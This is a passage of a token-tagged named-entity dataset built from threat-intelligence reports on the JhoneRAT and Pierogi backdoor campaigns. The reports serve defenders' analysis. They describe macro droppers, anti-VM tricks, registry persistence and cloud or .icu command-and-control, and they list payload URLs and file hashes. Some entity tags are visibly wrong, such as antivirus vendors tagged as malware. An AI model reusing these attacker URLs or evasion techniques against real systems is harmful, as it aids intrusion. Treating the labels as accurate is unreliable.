+operating O +system O +. O + +Attackers O +can O +abuse O +well-known B-TOOL +cloud I-TOOL +providers E-TOOL +and O +abuse O +their O +reputations O +in O +order O +to O +avoid O +detection O +. O + +The O +fact O +that O +this O +attacker O +decided O +to O +leverage O +cloud B-TOOL +services E-TOOL +and O +four B-TOOL +different I-TOOL +services E-TOOL +— O +and O +not O +their O +own O +infrastructure O +— O +is O +smart O +from O +an O +opsec O +point O +of O +view O +. O + +It O +is O +hard O +for O +the O +targets O +to O +identify O +legitimate O +and O +malicious O +traffic O +to O +cloud O +provider O +infrastructure O +. O + +Moreover O +, O +this O +kind O +of O +infrastructure O +uses O +HTTPS S-PROT +and O +the O +flow O +is O +encrypted O +that O +makes O +man-in-the-middle O +interception O +more O +complicated O +for O +the O +defender O +. O + +It O +is O +not O +the O +first O +time O +an O +attacker O +used O +only O +cloud B-TOOL +providers E-TOOL +. 
O + +Even O +while O +using O +these O +services O +, O +the O +authors O +of O +this O +JhoneRAT S-MAL +went O +further O +and O +used O +different O +user-agent O +strings O +depending O +on O +the O +request O +, O +and O +even O +on O +the O +downloaders O +the O +authors O +used O +other O +user-agent O +strings O +. O + +We O +already O +published O +a O +couple O +of O +articles O +about O +ROKRAT S-MAL +( O +here O +, O +here O +, O +here O +and O +here O +) O +where O +another O +unrelated O +actor O +, O +Group123 S-APT +, O +made O +the O +same O +choice O +but O +with O +different O +providers O +. O + +The O +attacker O +implemented O +filtering O +based O +on O +the O +keyboard O +'s O +layout O +. O + +The O +malware O +is O +executed O +only O +for O +the O +following O +layout O +, O +the O +country O +is O +based O +on O +the O +Microsoft S-IDTY +website O +: O + +' O +0401 O +' O +: O +Saudi B-LOC +Arabia E-LOC +. O +' O +0801 O +' O +: O +Iraq S-LOC +. O +' O +0c01 O +' O +: O +Egypt S-LOC +. O +' O +1001 O +' O +: O +Libya S-LOC +. O +' O +1401 O +' O +: O +Algeria S-LOC +. O +' O +1801 O +' O +: O +Morocco S-LOC +. O +' O +1c01 O +' O +: O +Tunisia S-LOC +. O +' O +2001 O +' O +: O +Oman S-LOC +. O +' O +2401 O +' O +: O +Yemen S-LOC +. O +' O +2801 O +' O +: O +Syria S-LOC +. O +' O +3801 O +' O +: O +UAE S-LOC +. O +' O +3401 O +' O +: O +Kuwait S-LOC +. O +' O +3c01 O +' O +: O +Bahrain S-LOC +. O +' O +3001 O +' O +: O +Lebanon S-LOC +. O + +We O +identified O +three O +malicious O +Microsoft B-TOOL +Office B-IDTY I-TOOL E-IDTY +documents E-TOOL +that O +download O +and O +load O +an O +additional O +Office O +document O +with O +a O +Macro S-TOOL +. O + +The O +oldest O +one O +from O +November B-TIME +2019 E-TIME +, O +named O +" O +Urgent.docx S-FILE +" O +. O + +The O +author O +of O +the O +document O +asks O +to O +enable O +editing O +in O +English O +and O +in O +Arabic O +. 
O + +The O +second O +document O +from O +the O +beginning B-TIME +of I-TIME +January E-TIME +is O +named O +" O +fb.docx S-FILE +" O +and O +contains O +usernames O +and O +passwords O +from O +an O +alleged O +" O +Facebook S-TOOL +" O +leak O +. O + +The O +more O +recent O +document O +is O +from O +mid-January S-TIME +and O +alleged O +to O +be O +from O +a O +United B-LOC +Arab I-LOC +Emirate E-LOC +organization O +. O + +The O +author O +blurred O +the O +content O +and O +asks O +the O +user O +to O +enable O +editing O +to O +see O +the O +content O +. O + +In O +the O +three O +documents O +, O +an O +additional O +Office B-TOOL +document E-TOOL +containing O +a O +Macro S-TOOL +is O +downloaded O +and O +executed O +. O + +The O +documents O +are O +located O +on O +Google B-TOOL +Drive E-TOOL +. O + +The O +template O +located O +on O +Google B-TOOL +Drive E-TOOL +contains O +a O +macro S-TOOL +. O + +The O +macro O +contains O +a O +virtual O +machine O +detection O +technique O +based O +on O +the O +serial O +number O +of O +the O +disks O +available O +in O +the O +victim O +environment O +. O + +Indeed O +, O +some O +VMs S-TOOL +do O +not O +have O +serial O +numbers O +and O +the O +macro O +is O +executed O +only O +if O +a O +serial O +number O +exists O +. O + +A O +WMIC S-TOOL +command O +is O +executed O +to O +get O +this O +information O +on O +the O +targeted O +system O +. O + +If O +a O +serial O +number O +exists O +, O +the O +rest O +of O +the O +code O +is O +executed O +. O + +The O +purpose O +is O +to O +download O +an O +image O +from O +a O +new O +Google O +Drive O +link O +. O + +It O +is O +interesting O +to O +note O +that O +the O +filename O +of O +the O +downloaded O +image O +is O +randomly O +generated O +based O +on O +a O +dictionary O +: O +Array O +("cartoon" O +, O +"img" O +,"photo") O +. 
O + +The O +filename O +will O +be O +cartoon.jpg S-FILE +or O +img.jpg S-FILE +or O +photo.jpg S-FILE +and O +the O +image O +usually O +depicts O +a O +cartoon O +. O + +The O +image O +file O +is O +a O +real O +image O +with O +a O +base64-encoded S-ENCR +binary O +appended O +at O +the O +end O +. O + +The O +malware O +author O +has O +a O +curious O +sense O +of O +humor O +. O + +The O +base64 S-ENCR +data O +and O +image O +are O +separated O +by O +the O +" O +**** O +" O +string O +. O + +The O +decoded O +binary O +filename O +is O +also O +randomly O +generated O +based O +on O +a O +dictionary O +: O +Array("proc" O +, O +"chrome" O +, O +"winrar") O +. O + +It O +can O +be O +proc.exe S-FILE +or O +chrome.exe S-FILE +or O +winrar.exe S-FILE +. O + +The O +decoded O +base64 S-ENCR +data O +is O +an O +AutoIT S-TOOL +binary O +. O + +This O +binary O +downloads O +a O +new O +file O +on O +Google B-TOOL +Drive E-TOOL +. O + +The O +filename O +is O +also O +randomly O +generated O +based O +on O +a O +dictionary O +$ARRAY[5]=["prc" O +,"winrar" O +,"chrome" O +,"sync" O +,"COM O +surr"] O +. O + +The O +final O +payload O +is O +a O +remote B-TOOL +access I-TOOL +tool E-TOOL +( O +RAT S-TOOL +) O +written O +in O +python S-TOOL +. O + +We O +named O +this O +RAT S-TOOL +" O +JhoneRAT S-MAL +" O +. O + +The O +python S-TOOL +code O +is O +wrapped O +into O +an O +executable O +using O +pyinstaller O +. O + +It O +uses O +minimal O +obfuscation O +applied O +only O +on O +variables O +and O +function O +naming O +. O + +The O +RAT S-TOOL +starts O +by O +launching O +three O +threads O +. O + +The O +first O +is O +responsible O +for O +checking O +if O +the O +system O +has O +the O +targeted O +keyboard O +layout O +— O +this O +is O +exclusively O +in O +Arabic-speaking O +countries O +. 
O + +The O +second O +will O +create O +the O +persistence O +and O +, O +finally O +, O +the O +last O +one O +to O +be O +started O +is O +the O +main O +cycle O +for O +the O +RAT S-TOOL +. O + +As O +we O +explained O +before O +, O +the O +RAT S-TOOL +targets O +specific O +countries O +by O +checking O +the O +keyboard O +'s O +layout O +. O + +In O +fact O +, O +this O +is O +one O +of O +the O +first O +checks O +it O +performs O +when O +it O +is O +executed O +. O + +The O +persistence O +is O +achieved O +by O +adding O +an O +entry O +with O +the O +name O +" O +ChromeUpdater O +" O +to O +the O +' O +Software\\Microsoft\\Windows\\CurrentVersion\\Run O +' O +. O + +This O +RAT S-TOOL +uses O +three O +different O +cloud O +services O +to O +perform O +all O +its O +command B-TOOL +and I-TOOL +control E-TOOL +( O +C2 S-TOOL +) O +activities O +. O + +It O +checks O +for O +new O +commands O +in O +the O +tweets O +from O +the O +handle O +@jhone87438316 O +( O +suspended O +by O +Twitter S-TOOL +) O +every O +10 O +seconds O +using O +the O +BeautifulSoup B-TOOL +HTML I-TOOL +parser E-TOOL +to O +identify O +new O +tweets O +. O + +These O +commands O +can O +be O +issued O +to O +a O +specific O +victim O +based O +on O +the O +UID O +generated O +on O +each O +target O +( O +by O +using O +the O +disk O +serial O +and O +contextual O +information O +such O +as O +the O +hostname O +, O +the O +antivirus O +and O +the O +OS O +) O +or O +to O +all O +of O +them O +. O + +The O +Exfiltration S-ACT +, O +however O +, O +is O +done O +via O +other O +cloud B-TOOL +providers E-TOOL +. O + +The O +screenshots O +are O +exfiltrated O +via O +the O +ImgBB S-TOOL +website O +. O + +The O +remaining O +commands O +send O +feedback O +by O +posting O +data O +into O +Google B-TOOL +Forms E-TOOL +. O + +Finally O +, O +the O +RAT S-TOOL +is O +able O +to O +download O +files O +encoded O +in O +base64 S-ENCR +on O +Google B-TOOL +Drive E-TOOL +. 
O + +Feature-wise O +, O +the O +RAT S-TOOL +has O +three O +commands O +: O + +Take O +a O +screenshot O +and O +upload O +it O +to O +ImgBB S-TOOL +. O + +Download O +binary O +disguised O +has O +a O +picture O +from O +Google B-TOOL +Drive E-TOOL +and O +execute O +it O +. O + +Execute O +a O +command O +and O +send O +the O +output O +to O +Google B-TOOL +Forms E-TOOL +. O + +The O +attacker O +put O +a O +couple O +of O +tricks O +in O +place O +to O +avoid O +execution O +on O +virtual O +machines O +( O +sandbox S-TOOL +) O +. O + +The O +first O +trick O +is O +the O +check O +of O +the O +serial O +number O +of O +the O +disk O +. O + +The O +actor O +used O +the O +same O +technique O +in O +the O +macro S-TOOL +and O +in O +the O +JhoneRAT S-MAL +. O + +By O +default O +, O +most O +of O +the O +virtual O +machines O +do O +not O +have O +a O +serial O +number O +on O +the O +disk O +. O + +The O +attacker O +used O +a O +second O +trick O +to O +avoid O +analysis O +of O +the O +python S-TOOL +code O +. O + +The O +actor O +used O +the O +same O +trick O +that O +FireEye S-SECTEAM +in O +the O +Flare-On B-TOOL +6 E-TOOL +: O +Challenge O +7: O +They O +removed O +the O +header O +of O +the O +python S-TOOL +bytecode O +. O + +It O +can O +be O +perfectly O +executed O +without O +the O +header O +, O +but O +tools O +such O +as O +uncompyle6 S-TOOL +need O +this O +header O +: O +$ O +uncompyle6 S-TOOL +final2 O +. O + +ImportError O +: O +Unknown O +magic O +number O +227 O +in O +final2 O +. O + +Additionally O +, O +the O +generated O +code O +by O +uncompyle6 S-TOOL +varies O +depending O +on O +the O +version O +and O +the O +impact O +is O +important O +. O + +Based O +on O +our O +analysis O +and O +the O +behaviour O +of O +the O +executed O +malware O +, O +the O +correct O +interpretation O +is O +the O +first O +one O +based O +on O +the O +oldest O +version O +of O +uncompyle6 S-TOOL +. 
O + +For O +this O +specific O +condition O +, O +it O +is O +important O +because O +it O +'s O +filtering O +on O +the O +keyboard O +layout O +to O +identify O +the O +targets O +. O + +This O +campaign O +shows O +a O +threat O +actor O +interested O +in O +specific O +Middle B-LOC +Eastern E-LOC +and O +Arabic-speaking O +countries O +. O + +It O +also O +shows O +us O +an O +actor O +that O +puts O +effort O +in O +opsec S-TOOL +by O +only O +using O +cloud B-TOOL +providers E-TOOL +. O + +The O +malicious O +documents O +, O +the O +droppers O +and O +the O +RAT S-TOOL +itself O +are O +developed O +around O +cloud B-TOOL +providers E-TOOL +. O + +Additionally O +the O +attackers O +implemented O +anti-VM S-TOOL +( O +and O +sandbox S-TOOL +) O +and O +anti-analysis B-TOOL +tricks E-TOOL +to O +hide O +the O +malicious O +activities O +to O +the O +analyst O +. O + +For O +example O +, O +the O +VM S-TOOL +or O +the O +sandbox S-TOOL +must O +have O +the O +keyboard O +layout O +of O +the O +targeted O +countries O +and O +a O +disk O +serial O +number O +. O + +This O +campaign O +started O +in O +November B-TIME +2019 E-TIME +and O +it O +is O +still O +ongoing O +. O + +At O +this O +time O +, O +the O +API O +key O +is O +revoked O +and O +the O +Twitter S-TOOL +account O +is O +suspended O +. O + +However O +, O +the O +attacker O +can O +easily O +create O +new O +accounts O +and O +update O +the O +malicious O +files O +in O +order O +to O +still O +work O +. O + +This O +campaign O +shows O +us O +that O +network-based O +detection O +is O +important O +but O +must O +be O +completed O +by O +system O +behaviour O +analysis O +. O + +JhoneRAT S-MAL +: O +273aa20c4857d98cfa51ae52a1c21bf871c0f9cd0bf55d5e58caba5d1829846f S-SHA2 +. O + +JhoneRAT S-MAL +: O +29886dbbe81ead9e9999281e62ecf95d07acb24b9b0906b28beb65a84e894091 S-SHA2 +. O + +JhoneRAT S-MAL +: O +d5f10a0b5c103100a3e74aa9014032c47aa8973b564b3ab03ae817744e74d079 S-SHA2 +. 
O + +JhoneRAT S-MAL +: O +6cc0c11c754e1e82bca8572785c27a364a18b0822c07ad9aa2dc26b3817b8aa4 S-SHA2 +. O + +JhoneRAT S-MAL +: O +7e1121fca3ac7c2a447b61cda997f3a8202a36bf9bb08cca3402df95debafa69 S-SHA2 +. O + +JhoneRAT S-MAL +: O +b4a43b108989d1dde87e58f1fd6f81252ef6ae19d2a5e8cd76440135e0fd6366 S-SHA2 +. O + +JhoneRAT S-MAL +: O +https://drive.google.com/uc?export=download&id=1vED0wN0arm9yu7C7XrbCdspLjpoPKfrQ S-MAL +. O + +JhoneRAT S-MAL +: O +https://drive.google.com/uc?export=download&id=1LVdv4bjcQegPdKrc5WLb4W7ad6Zt80zl S-DOM +. O + +JhoneRAT S-MAL +: O +https://drive.google.com/uc?export=download&id=1OlQssMvjb7gI175qDx8SqTgRJIEp5Ypd S-DOM +. O + +JhoneRAT S-MAL +: O +https://drive.google.com/uc?export=download&id=1d-toE89QnN5ZhuNZIc2iF4-cbKWtk0FD S-DOM +. O + +JhoneRAT S-MAL +: O +https://drive.google.com/uc?export=download&id=1kbHVkvPIjX49qJ62TBz6drW2YPiiaX2a S-DOM +. O + +JhoneRAT S-MAL +: O +https://twitter.com/jhone87438316 S-DOM +. O + + +New O +Cyber O +Espionage O +Campaigns O +Targeting O +Palestinians S-LOC +- O +Part O +2 O +: O +The O +Discovery O +of O +the O +New O +, O +Mysterious O +Pierogi B-MAL +backdoor E-MAL +. O + +Since O +December B-TIME +2019 E-TIME +, O +the O +Cybereason B-SECTEAM +Nocturnus E-SECTEAM +team O +has O +been O +investigating O +a O +campaign O +targeting O +Palestinian O +individuals O +and O +entities O +in O +the O +Middle B-LOC +East E-LOC +, O +mostly O +within O +the O +Palestinian B-LOC +territories E-LOC +. O + +This O +campaign O +uses O +social O +engineering O +and O +decoy O +documents O +related O +to O +geopolitical O +affairs O +and O +relations O +between O +the O +Palestinian B-IDTY +government E-IDTY +, O +and O +references O +Egypt S-LOC +, O +Hezbollah S-LOC +, O +and O +Iran S-LOC +. 
O + +Part O +one O +of O +this O +research O +investigates O +the O +Spark B-ACT +campaign E-ACT +, O +where O +attackers O +use O +social O +engineering O +to O +infect O +victims O +, O +mainly O +from O +the O +Palestinian B-LOC +territories E-LOC +, O +with O +the O +Spark B-MAL +backdoor E-MAL +. O + +For O +more O +information O +about O +part O +one O +, O +click O +here O +. O + +During O +the O +attacks O +, O +victims O +are O +infected O +with O +a O +previously O +undocumented O +backdoor S-MAL +, O +dubbed O +Pierogi S-MAL +by O +Cybereason S-IDTY +. O + +This O +backdoor S-MAL +allows O +attackers O +to O +spy O +on O +targeted O +victims O +. O + +Cybereason S-IDTY +suspects O +that O +the O +backdoor S-MAL +may O +have O +been O +obtained O +in O +underground O +communities O +rather O +than O +home-grown O +, O +as O +the O +evidence O +found O +in O +the O +code O +of O +the O +backdoor O +suggests O +it O +may O +have O +been O +developed O +by O +Ukranian-speaking O +hackers O +. O + +The O +tactics O +, O +techniques O +, O +and O +procedures O +( O +TTPs O +) O +, O +content O +, O +and O +theme O +of O +the O +decoy O +documents O +, O +as O +well O +as O +the O +victimology O +observed O +in O +the O +campaign O +, O +resemble O +previous O +attacks O +that O +have O +targeted O +Palestinians O +. O + +In O +particular O +, O +these O +campaigns O +appear O +to O +be O +related O +to O +attacks O +carried O +out O +by O +a O +group O +called O +MoleRATs S-APT +( O +aka O +, O +Gaza B-APT +Cyber I-APT +Gang E-APT +, O +Moonlight S-APT +) O +, O +an O +Arabic-speaking O +, O +politically O +motivated O +group O +that O +has O +been O +operating O +in O +the O +Middle B-LOC +East E-LOC +since O +2012 S-TIME +. 
O + +Cyber O +Espionage O +with O +a O +New O +Malware O +: O +The O +Cybereason B-SECTEAM +Nocturnus E-SECTEAM +team O +has O +discovered O +recent O +, O +targeted O +attacks O +in O +the O +Middle B-LOC +East E-LOC +to O +deliver O +the O +Pierogi B-MAL +backdoor E-MAL +for O +politically-driven O +cyber O +espionage O +. O + +Targeting O +Palestinians S-LOC +: O +The O +campaigns O +seems O +to O +target O +Palestinian O +individuals O +and O +entities O +, O +likely O +related O +to O +the O +Palestinian B-IDTY +government E-IDTY +. O + +Using O +Geopolitically-charged O +Lure O +Content O +: O +The O +attackers O +use O +specially O +crafted O +lure O +content O +to O +trick O +their O +targets O +into O +opening O +malicious O +files O +that O +infect O +the O +victim O +’s O +machine O +with O +the O +Pierogi B-MAL +backdoor E-MAL +. O + +The O +decoy O +content O +of O +the O +malicious O +files O +revolves O +around O +various O +political O +affairs O +in O +the O +Middle B-LOC +East E-LOC +, O +specifically O +targeting O +the O +tension O +between O +Hamas S-LOC +and O +other O +entities O +in O +the O +region O +. O + +Perpetrated O +by O +an O +Arabic-speaking O +APT O +, O +MoleRATs S-APT +: O +The O +modus-operandi O +of O +the O +attackers O +as O +well O +as O +the O +social O +engineering O +decoy O +content O +seem O +aligned O +with O +previous O +attacks O +carried O +out O +by O +an O +Arabic-speaking O +APT O +group O +called O +MoleRATs S-APT +( O +aka O +Gaza B-APT +Cybergang E-APT +) O +. O + +This O +group O +has O +been O +operating O +in O +the O +Middle B-LOC +East E-LOC +since O +2012 S-TIME +. O + +Similar O +to O +previous O +attacks O +, O +this O +campaign O +starts O +with O +social O +engineering O +. O + +In O +one O +instance O +, O +it O +lures O +victims O +to O +open O +an O +email S-TOOL +attachment O +. 
O + +In O +others O +, O +it O +persuades O +victims O +to O +download O +a O +report O +about O +a O +recent O +political O +affair O +pertaining O +to O +the O +Middle B-LOC +East E-LOC +and O +specifically O +to O +Palestinian O +matters O +. O + +In O +most O +cases O +, O +the O +downloaded O +file O +is O +either O +an O +executable O +that O +masquerades O +as O +a O +Microsoft B-TOOL +Word I-TOOL +document E-TOOL +or O +a O +weaponized B-TOOL +Microsoft I-TOOL +Word E-TOOL +document O +. O + +As O +soon O +as O +the O +victim O +double-clicks O +on O +the O +dropper O +, O +they O +are O +presented O +with O +the O +decoy O +document O +. O + +The O +document O +lowers O +the O +victim O +’s O +suspicions O +by O +distracting O +them O +with O +a O +real O +document O +while O +the O +dropper O +installs O +the O +backdoor S-MAL +. O + +However O +, O +some O +of O +the O +documents O +also O +play O +an O +additional O +role O +in O +the O +attack O +. O + +While O +some O +are O +more O +neutral O +, O +quoting O +from O +newspapers O +and O +the O +media O +, O +others O +seem O +to O +report O +fake O +news O +to O +spread O +misinformation O +that O +serves O +a O +political O +agenda O +. O + +With O +regards O +to O +decoy O +content O +themes O +, O +this O +campaign O +resembles O +previous O +campaigns O +reported O +in O +blogs O +by O +Vectra O +, O +Unit B-SECTEAM +42 E-SECTEAM +, O +and O +Talos S-SECTEAM +. O + +The O +contents O +of O +the O +decoy O +documents O +seems O +to O +include O +: O + +Potentially O +fake O +documents O +that O +appear O +to O +be O +issued O +by O +the O +Palestinian B-IDTY +government E-IDTY +. O + +Meetings O +minutes O +of O +different O +Palestinian S-LOC +organizations O +. O + +News O +about O +Hamas S-LOC +and O +the O +Palestinian B-IDTY +National I-IDTY +Authority E-IDTY +. O + +Potentially O +fake O +, O +leaked O +Hamas S-LOC +documents O +. 
O + +Criticism O +of O +and O +embarrassing O +content O +about O +Hamas S-LOC +. O + +APA S-IDTY B-FILE +adopted I-FILE +resolution I-FILE +Unlimited I-FILE +support I-FILE +for I-FILE +Palestinian I-FILE +people.docx E-FILE +: O + +Describes O +a O +resolution O +by O +the O +Asian B-IDTY +Parliamentary I-IDTY +Assembly E-IDTY +( O +APA S-IDTY +) O +held O +in O +Anatalya S-LOC +, O +announcing O +unlimited O +support O +for O +the O +Palestinian O +people O +7b4c736b92ce702fb584845380e237aa55ddb4ef693ea65a766c9d9890b3852c S-SHA2 +. O +jalsa.rar S-FILE +: O + +Contains O +the O +above O +mentioned O +document O +, O +as O +well O +as O +photos O +of O +the O +assemblies O +and O +political O +cartoons O +criticizing O +Hamas S-LOC +50a597aa557084e938e2a987ec5db99187428091e8141e616cced72e6a39de1b S-SHA2 +. O + +Internet B-FILE +in I-FILE +government.pdf E-FILE +/ O +Define B-FILE +the I-FILE +Internet I-FILE +in I-FILE +government I-FILE +institutions.pdf E-FILE +: O + +Announcement O +about O +a O +new O +regulation O +regarding O +internet O +usage O +in O +Palestinian B-IDTY +government E-IDTY +institutions O +. O + +The O +announcement O +states O +that O +porn O +, O +gambling O +and O +entertainment O +sites O +will O +be O +blocked O +9e4464d8dc8a3984561a104a93a7b8d6eb3d622d5187ae1d3fa6f6dafa2231a8 S-SHA2 +. O + +Congratulations_Jan-7.pdf S-FILE +: O + +Letter O +allegedly O +from O +the O +Barcelona B-IDTY B-LOC +branch E-LOC E-IDTY +of O +the O + +Federation B-IDTY +of I-IDTY +Independent I-IDTY +Palestinian I-IDTY +Communities I-IDTY +and I-IDTY +Organizations I-IDTY +and I-IDTY +Events E-IDTY +in O +the O +Diaspora O +. O + +The O +letter O +commemorates O +the O +73rd O +anniversary O +of O +the O +Syrian B-IDTY +Army E-IDTY +, O +and O +expresses O +the O +Palestinian O +support O +of O +Bashar O +Al-Asad O +. 
O + +The O +letter O +ends O +with O +“ O +Death O +to O +Israel O +” O +and O +“ O +Humiliation O +and O +shame O +to O +the O +tyrant O +America O +” O +65c8b9e9017ac84d90553a252c836c38b6a3902e5ab24d3a4b8a584e2d615fcc S-SHA2 +. O + +Daily_Report.docx S-FILE +: O + +Daily O +summary O +of O +news O +concerning O +different O +Palestinian B-IDTY +govenment E-IDTY +related O +issues O +d3771d58051cb0f4435232769ed11c0c0e6457505962ddb6eeb46d900de55428 S-SHA2 +. O + +Directory B-FILE +of I-FILE +Government I-FILE +Services.pdf E-FILE +: O + +A O +screenshot O +from O +a O +website O +of O +the O +Palestinian B-IDTY +government E-IDTY +, O +showing O +a O +directory O +of O +the O +different O +ministries O +9e4464d8dc8a3984561a104a93a7b8d6eb3d622d5187ae1d3fa6f6dafa2231a8 S-SHA2 +. O + +Meeting B-FILE +Agenda.pdf E-FILE +: O + +Corrupted O +file O +f6876fd68fdb9c964a573ad04e4e0d3cfd328304659156efc9866844a28c7427 S-SHA2 +. O +imgonline-com-ua-dexifEEdWuIbNSv7G.jpg S-FILE +: O + +potentially O +leaked O +Hamas S-LOC +document O +detailing O +Hamas S-LOC +32nd O +anniversary O +expenses O +in O +different O +regions O +in O +the O +Palestinian B-LOC +Territories E-LOC +932ecbc5112abd0ed30231896752ca471ecd0c600b85134631c1d5ffcf5469fb S-SHA2 +. O + +Asala.mp3 S-FILE +: O + +An O +.mp3 S-FILE +file O +of O +a O +song O +by O +the O +famous O +Syrian S-LOC +singer O +Asala O +Nasri O +( O +song O +name O +: O +Fen O +Habibi O +, O +translation O +: O +“ O +where O +is O +my O +loved O +one? O +” O +) O +4583b49086c7b88cf9d074597b1d65ff33730e1337aee2a87b8745e94539d964 S-SHA2 +. O + +In O +addition O +to O +the O +documents O +, O +the O +content O +includes O +a O +number O +of O +political O +cartoons O +that O +criticize O +Hamas S-LOC +’ O +relations O +with O +Iran S-LOC +and O +Hamas S-LOC +’ O +standing O +as O +a O +resistance O +movement O +. 
O + +While O +the O +majority O +of O +infections O +in O +this O +campaign O +did O +not O +originate O +from O +Malicious B-TOOL +Microsoft I-TOOL +Word I-TOOL +document E-TOOL +, O +the O +Cybereason B-SECTEAM +Nocturnus E-SECTEAM +team O +found O +several O +weaponized B-TOOL +Microsoft I-TOOL +Word I-TOOL +document E-TOOL +with O +an O +embedded O +downloader B-TOOL +macro E-TOOL S-TOOL +that O +downloads O +and O +installs O +the O +backdoor S-MAL +used O +in O +this O +attack O +. O + +CV B-FILE +Manal I-FILE +1 E-FILE +: O + +Resume O +of O +a O +woman O +from O +Abu-Dis S-LOC +, O +Palestinian B-IDTY +Authority E-IDTY +4a6d1b686873158a1eb088a2756daf2882bef4f5ffc7af370859b6f87c08840f S-SHA2 +. O + +Employee-entitlements-2020.doc S-FILE +: O + +A O +statement O +of O +the O +Ministry B-IDTY +of I-IDTY +Finance E-IDTY +on O +civil O +and O +military O +employee O +benefits O +and O +salaries O +, O +discussing O +the O +conterversial O +issue O +Palestinian B-IDTY +Authority E-IDTY +employees O +that O +have O +not O +been O +paid O +or O +paid O +in O +full O +their O +salaries O +b33f22b967a5be0e886d479d47d6c9d35c6639d2ba2e14ffe42e7d2e5b11ad80 S-SHA2 +. O + +When O +the O +victims O +open O +the O +document O +, O +they O +are O +encouraged O +to O +click O +on O +Enable O +Content O +, O +which O +causes O +the O +embedded O +malicious B-TOOL +macro E-TOOL S-TOOL +code O +to O +run O +. O + +The O +macro O +code O +embedded O +in O +the O +document O +is O +rather O +simple O +and O +is O +not O +obfuscated O +. O + +In O +fact O +, O +it O +is O +almost O +unusual O +in O +its O +unsophistication O +. O + +The O +macro O +code O +does O +the O +following O +: O + +Downloads O +a O +Base64 S-ENCR +encoded O +payload O +from O +the O +following O +URL O +: O + +http://linda-callaghan.icu/Minkowski/brown S-URL +. O + +Writes O +the O +decoded O +payload O +to O +C:\ProgramData\IntegratedOffice.txt O +. 
O + +Decodes O +the O +Base64 S-ENCR +payload O +and O +writes O +the O +file O +to O +C:\ProgramData\IntegratedOffice.exe S-FILE +. O + +Runs O +the O +executable O +file O +and O +deletes O +the O +.txt S-FILE +file O +. O + +Pierogi S-MAL +, O +the O +backdoor S-MAL +in O +this O +attack O +, O +appears O +to O +be O +a O +new O +backdoor S-TOOL +written O +in O +Delphi S-TOOL +. O + +It O +enables O +the O +attackers O +to O +spy O +on O +victims O +using O +rather O +basic O +backdoor S-MAL +capabilities O +. O + +While O +it O +is O +unknown O +at O +this O +point O +whether O +the O +backdoor S-MAL +was O +coded O +by O +the O +same O +members O +of O +the O +group O +behind O +the O +attacks O +, O +there O +are O +indications O +that O +suggest O +that O +the O +malware O +was O +authored O +by O +Ukranian-speaking O +malware O +developers O +. O + +The O +commands O +used O +to O +communicate O +with O +the O +C2 S-TOOL +servers O +and O +other O +strings O +in O +the O +binary O +are O +written O +in O +Ukrainian O +. O + +This O +is O +why O +we O +chose O +to O +name O +the O +malware O +Pierogi S-MAL +, O +after O +the O +popular O +East B-LOC +European E-LOC +dish O +. O + +The O +backdoor O +has O +the O +following O +capabilities O +: O + +Collects O +information O +about O +the O +infected O +machine O +. O + +Uploads O +files O +to O +the O +attackers O +’ O +server O +. O + +Downloads O +additional O +payloads O +. O + +Takes O +screenshots O +from O +the O +infected O +machine O +. O + +Executes O +arbitrary O +commands O +via O +the O +CMD B-TOOL +shell E-TOOL +. O + +In O +addition O +to O +spy O +features O +, O +the O +backdoor S-MAL +also O +implements O +a O +few O +checks O +to O +ensure O +it O +is O +running O +in O +a O +safe O +environment O +. O + +Specifically O +, O +it O +looks O +for O +antivirus O +and O +other O +security O +products O +. 
O + +The O +backdoor S-MAL +queries O +Windows S-OS +for O +installed O +antivirus O +software O +using O +WMI S-TOOL +: O +SELECT O +* O +FROM O +AntiVirusProduct O +It O +looks O +for O +specific O +antivirus O +and O +security O +products O +installed O +on O +the O +infected O +machine O +, O +such O +as O +Kaspersky S-MAL +, O +eScan S-MAL +, O +F-secure S-MAL +and O +Bitdefender S-MAL +. O + +The O +backdoor S-MAL +achieves O +persistence O +using O +a O +classic O +startup O +item O +autorun O +technique O +: O + +A O +shortcut O +is O +added O +to O +the O +the O +startup O +folder O +: O +C:\Users\User\AppData\Roaming\Microsoft\Windows\Start O +Menu\Programs\Startup O +. O + +Once O +the O +user O +logs O +on O +to O +the O +infected O +machine O +, O +the O +shortcut O +points O +to O +the O +file O +binary O +location O +in O +the O +C:\ProgramData\ O +folder O +. O + +The O +GUID S-TOOL +generated O +by O +the O +malware O +is O +saved O +in O +a O +file O +called O +GUID.bin S-FILE +. O + +This O +file O +is O +created O +in O +the O +same O +folder O +as O +the O +binary O +of O +the O +backdoor S-MAL + +( O +C:\ProgramData\GUID.bin O +) O +. O + +The O +backdoor S-MAL +has O +rather O +basic O +C2 S-TOOL +functionality O +implemented O +through O +a O +predefined O +set O +of O +URLs O +: O + +1 O +. O + +Sending O +machine O +information O +and O +a O +heartbeat O +to O +the O +C2 S-TOOL +: O + +URL O +: O +http://nicoledotson.icu/debby/weatherford/Yortysnr S-URL +The O +information O +sent O +to O +the O +C2 S-TOOL +includes O +: O + +cname O +: O + +computer O +name O +, O +username O +, O +and O +GUID S-TOOL +. O +av O +: O +Name O +of O +detected O +antivirus O +. O +osversion O +: O +version O +of O +the O +operating O +system O +. O +aname O +: O +the O +location O +of O +the O +malware O +on O +the O +infected O +machine O +. 
O + +Requesting O +commands O +from O +the O +C2 S-TOOL +server O +: O + +URL O +: O +http://nicoledotson.icu/debby/weatherford/Ekspertyza S-URL +. O + +Ekspertyza O +means O +expertise O +or O +examination O +in O +Ukranian O +. O + +There O +are O +3 O +basic O +commands O +coming O +from O +the O +server O +in O +the O +form O +of O +MD5 S-ENCR +hashes O +: O + +Dfff0a7fa1a55c8c1a4966c19f6da452 S-MD5 +: O +cmd O +. O +51a7a76a7dd5d9e4651fe3d4c74d16d6 S-SHA2 +: O +downloadfile O +. O +62c92ba585f74ecdbef4c4498a438984 S-SHA2 +: O +screenshot O +. O + +Uploading O +data O +( O +mainly O +screenshots O +) O +to O +the O +C2 S-TOOL +: O + +URL O +: O +http://nicoledotson.icu/debby/weatherford/Zavantazhyty S-URL +. O + +Zavantazhyty O +means O +to O +load O +or O +download O +in O +Ukranian O +. O + +This O +command O +is O +used O +to O +upload O +collected O +data O +to O +the O +C2 S-TOOL +server O +. O + +For O +example O +, O +in O +some O +instances O +the O +backdoor S-MAL +uploads O +screenshots O +taken O +from O +an O +infected O +machine O +, O +as O +can O +be O +seen O +in O +the O +example O +below O +. O + +Removing O +information O +: O + +URL O +: O +http://nicoledotso.icu/debby/weatherford/Vydalyty S-URL +. O + +Vydalyty O +means O +to O +remove O +or O +delete O +in O +Ukrainian O +. O + +The O +malware O +can O +delete O +various O +requests O +based O 